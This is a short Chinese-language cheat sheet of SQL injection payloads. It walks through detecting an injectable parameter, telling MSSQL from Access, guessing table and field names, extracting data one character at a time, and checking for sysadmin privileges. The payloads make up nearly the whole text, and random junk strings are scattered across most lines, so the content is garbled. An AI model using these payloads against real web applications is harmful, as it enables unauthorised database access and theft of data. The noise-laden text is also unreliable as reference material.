1.判断是否有注入;and 1=1 ;and 1=2 C- 5QhD
2.初步判断是否是mssql ;and user>0 2(I S*idq
Rax]svc
3.注入参数是字符'and [查询条件] and ''=' {z#!3a
Q~k5 }n8
4.搜索时没过滤参数的'and [查询条件] and '%25'=' R*0]*\C z
7<GC{/^T
5.判断数据库系统 | KtI:n4d
IVSOSl|
;and (select count(*) from sysobjects)>0 mssql 56w uk
[)
q7z`oK5
;and (select count(*) from msysobjects)>0 access MHj
RPh
A |u-VXQ
}fO+b5U
+~(SeTY
6.猜数据库 ;and (select Count(*) from [数据库名])>0 n
f.H0i;
CiWz>HWH
7.猜字段 ;and (select Count(字段名) from 数据库名)>0 _=Z?5{7S>
)_n=it$
8.猜字段中记录长度 ;and (select top 1 len(字段名) from 数据库名)>0 uwl_TDc>%
ylm #Xa
9.(1)猜字段的ascii值(access) HK
NT. a
r[g
;and (select top 1 asc(mid(字段名,1,1)) from 数据库名)>0 j+9;Rvt2
<*Nd%Ca
(2)猜字段的ascii值(mssql) XEegUTs
mqtX7rej
;and (select top 1 unicode(substring(字段名,1,1)) from 数据库名)>0 <@Z`<T6
R1$s1@3I|
10.测试权限结构(mssql) E$.f AIt
Upa F>,kM
71n3d~!O>
kx?f, ^-
;and 1=(select IS_SRVROLEMEMBER('sysadmin'));-- 12VIP-ABK
r=-b@U.fk>
;and 1=(select IS_SRVROLEMEMBER('serveradmin'));-- Ptm=c6H('
iD*21c<